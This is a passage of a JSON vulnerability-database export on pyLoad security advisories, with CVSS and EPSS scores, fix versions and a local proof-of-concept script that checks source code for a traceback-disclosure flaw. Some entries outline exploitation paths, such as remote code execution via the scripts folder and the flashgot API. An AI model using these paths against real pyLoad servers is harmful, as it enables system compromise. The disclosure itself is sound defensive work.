"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464" }, { "reference_url": "https://www.cve.org/CVERecord?id=CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2026-33509" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35464", "GHSA-4744-96p5-mp2j" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9rb6-kh78-sbdf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93564?format=api", "vulnerability_id": "VCID-9u2h-q8gu-t7h4", "summary": "PyLoad vulnerable to unauthenticated traceback disclosure via global exception handler in WebUI\n### Summary\n`pyload-ng` WebUI returns full Python traceback details to clients on unhandled exceptions.\n\nBecause `/web/<path:filename>` is reachable without authentication and renders attacker-controlled template names, an unauthenticated user can reliably trigger a server exception (for example by requesting a non-existent template) and receive internal stack traces in the HTTP response.\n\n### Details\nThe issue is caused by the combination of:\n\n1. Unauthenticated template-render route:\n- `src/pyload/webui/app/blueprints/app_blueprint.py:32-36`\n - `@bp.route(\"/web/<path:filename>\", endpoint=\"web\")`\n - `data = render_template(filename)` with user-controlled `filename`\n - no `@login_required(...)` on this route\n\n2. Global exception handler exposes traceback to response:\n- `src/pyload/webui/app/handlers.py:14-27`\n - `tb = traceback.format_exc()`\n - `messages.extend(tb.split('\\n'))`\n - returned in rendered error page for all exceptions\n\n3. Error page renders all `messages`:\n- `src/pyload/webui/app/themes/modern/templates/base.html:217-219`\n - loops over `messages` and prints them in response HTML\n\nSo any unhandled exception can disclose internal implementation details (stack frames, source paths, exception metadata) to remote unauthenticated clients. \n\nThis is a core behavior issue in default WebUI error handling\n\n### PoC\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport re\nimport shutil\nimport tempfile\nimport traceback\nfrom pathlib import Path\n\n\nROOT = Path(__file__).resolve().parent / \"pyload\" / \"src\" / \"pyload\"\n\n\ndef read_text(rel: str) -> str:\n return (ROOT / rel).read_text(encoding=\"utf-8\")\n\n\ndef route_has_no_login_required(app_blueprint: str) -> bool:\n m = re.search(\n r'@bp\\\\.route\\\\(\"/web/<path:filename>\", endpoint=\"web\"\\\\)\\\\s*'\n r\"def render\\\\(filename\\\\):(?P<body>.*?)(?:\\\\n\\\\n@bp\\\\.route|\\\\Z)\",\n app_blueprint,\n re.DOTALL,\n )\n if not m:\n return False\n block_start = max(0, m.start() - 200)\n block = app_blueprint[block_start:m.end()]\n return \"@login_required(\" not in block\n\n\ndef main() -> None:\n workdir = Path(tempfile.mkdtemp(prefix=\"pyload-traceback-infoleak-\"))\n try:\n app_blueprint = read_text(\"webui/app/blueprints/app_blueprint.py\")\n handlers = read_text(\"webui/app/handlers.py\")\n base_template = read_text(\"webui/app/themes/modern/templates/base.html\")\n\n unauth_web_route = '/web/<path:filename>' in app_blueprint and route_has_no_login_required(app_blueprint)\n user_controlled_template_name = \"render_template(filename)\" in app_blueprint\n handler_uses_traceback = \"traceback.format_exc()\" in handlers\n handler_appends_trace = \"messages.extend(tb.split('\\\\n'))\" in handlers\n global_exception_handler = \"(Exception, handle_exception_error)\" in handlers\n template_renders_messages = \"{% for message in messages %}\" in base_template and \"{{message}}\" in base_template\n\n leaked_traceback_keyword = False\n leaked_exception_type = False\n try:\n raise RuntimeError(\"forced-poc-error\")\n except Exception:\n tb = traceback.format_exc()\n messages = [f\"Error 500: forced-poc-error\"]\n messages.extend(tb.split(\"\\\\n\"))\n joined = \"\\\\n\".join(messages)\n leaked_traceback_keyword = \"Traceback (most recent call last)\" in joined\n leaked_exception_type = \"RuntimeError: forced-poc-error\" in joined\n\n repro_success = all(\n [\n unauth_web_route,\n user_controlled_template_name,\n handler_uses_traceback,\n handler_appends_trace,\n global_exception_handler,\n template_renders_messages,\n leaked_traceback_keyword,\n leaked_exception_type,\n ]\n )\n\n print(\"unauth_web_route=\", unauth_web_route)\n print(\"user_controlled_template_name=\", user_controlled_template_name)\n print(\"handler_uses_traceback=\", handler_uses_traceback)\n print(\"handler_appends_trace=\", handler_appends_trace)\n print(\"global_exception_handler=\", global_exception_handler)\n print(\"template_renders_messages=\", template_renders_messages)\n print(\"leaked_traceback_keyword=\", leaked_traceback_keyword)\n print(\"leaked_exception_type=\", leaked_exception_type)\n print(\"traceback_infoleak_repro_success=\", repro_success)\n finally:\n shutil.rmtree(workdir, ignore_errors=True)\n print(\"cleanup_done=True\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nObserved result:\n```text\nunauth_web_route= True\nuser_controlled_template_name= True\nhandler_uses_traceback= True\nhandler_appends_trace= True\nglobal_exception_handler= True\ntemplate_renders_messages= True\nleaked_traceback_keyword= True\nleaked_exception_type= True\ntraceback_infoleak_repro_success= True\ncleanup_done=True\n```\n\n### Impact\n- Vulnerability type: Information disclosure (stack trace / internal path leakage).\n- Attack surface: unauthenticated WebUI request path.\n- Exposes internal error details that help attackers map application internals and improve exploit reliability for follow-on attacks.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44226", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20894", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44226" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:26:38Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44226", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44226" }, { "reference_url": "https://github.com/advisories/GHSA-c3gc-9pf2-84gg", "reference_id": "GHSA-c3gc-9pf2-84gg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c3gc-9pf2-84gg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-44226", "GHSA-c3gc-9pf2-84gg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9u2h-q8gu-t7h4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36908?format=api", "vulnerability_id": "VCID-a7fd-nsys-qub1", "summary": "pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47821", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01807", "scoring_system": "epss", "scoring_elements": "0.83188", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47821" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-28T17:19:04Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47821", "reference_id": "CVE-2024-47821", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47821" }, { "reference_url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g", "reference_id": "GHSA-w7hq-f2pj-c53g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48571?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev87", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87" } ], "aliases": [ "CVE-2024-47821", "GHSA-w7hq-f2pj-c53g", "PYSEC-2024-302" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a7fd-nsys-qub1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57660?format=api", "vulnerability_id": "VCID-bzxw-4smh-6yed", "summary": "pyLoad vulnerable to XSS through insecure CAPTCHA\nAn unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows **unauthenticated remote attackers** to execute **arbitrary code** in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53890", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0107", "scoring_system": "epss", "scoring_elements": "0.78103", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53890" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546" }, { "reference_url": "https://github.com/pyload/pyload/pull/4586", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/pull/4586" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53890", "reference_id": "CVE-2025-53890", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53890" }, { "reference_url": "https://github.com/advisories/GHSA-8w3f-4r8f-pf53", "reference_id": "GHSA-8w3f-4r8f-pf53", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8w3f-4r8f-pf53" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53", "reference_id": "GHSA-8w3f-4r8f-pf53", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/85763?format=api", "purl": "pkg:pypi/pyload-ng@0.20", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.20" } ], "aliases": [ "CVE-2025-53890", "GHSA-8w3f-4r8f-pf53" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bzxw-4smh-6yed" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37297?format=api", "vulnerability_id": "VCID-c4n8-pnbr-buce", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev98, the set_session_cookie_secure before_request handler in src/pyload/webui/app/__init__.py reads the X-Forwarded-Proto header from any HTTP request without validating that the request originates from a trusted proxy, then mutates the global Flask configuration SESSION_COOKIE_SECURE on every request. Because pyLoad uses the multi-threaded Cheroot WSGI server (request_queue_size=512), this creates a race condition where an attacker's request can influence the Secure flag on other users' session cookies — either downgrading cookie security behind a TLS proxy or causing a session denial-of-service on plain HTTP deployments. This vulnerability is fixed in 0.5.0b3.dev98.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40594", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01352", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40594" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T18:01:27Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40594", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40594" }, { "reference_url": "https://github.com/advisories/GHSA-mp82-fmj6-f22v", "reference_id": "GHSA-mp82-fmj6-f22v", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mp82-fmj6-f22v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38742?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev69", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-pgh8-2pmw-7ba7" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-tbkm-qa82-jkaw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzcg-gg18-9uhg" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev69" }, { "url": "http://public2.vulnerablecode.io/api/packages/50304?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev98", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev98" } ], "aliases": [ "CVE-2026-40594", "GHSA-mp82-fmj6-f22v", "PYSEC-2026-125" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4n8-pnbr-buce" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47980?format=api", "vulnerability_id": "VCID-f95r-tk7k-gufe", "summary": "pyLoad CNL and captcha handlers allow Code Injection via unsanitized parameters\npyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted.\n\nuser-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow.\nCNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61773", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.21024", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61773" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca" }, { "reference_url": "https://github.com/pyload/pyload/pull/4624", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/pull/4624" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61773", "reference_id": "CVE-2025-61773", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61773" }, { "reference_url": "https://github.com/advisories/GHSA-cjjf-27cc-pvmv", "reference_id": 